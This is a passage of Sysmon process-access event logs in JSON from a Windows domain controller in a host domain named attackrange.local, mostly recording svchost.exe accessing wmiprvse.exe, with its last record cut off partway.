{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.312\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.312","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.312\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.312","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.312\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.312","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.375\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.375","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files 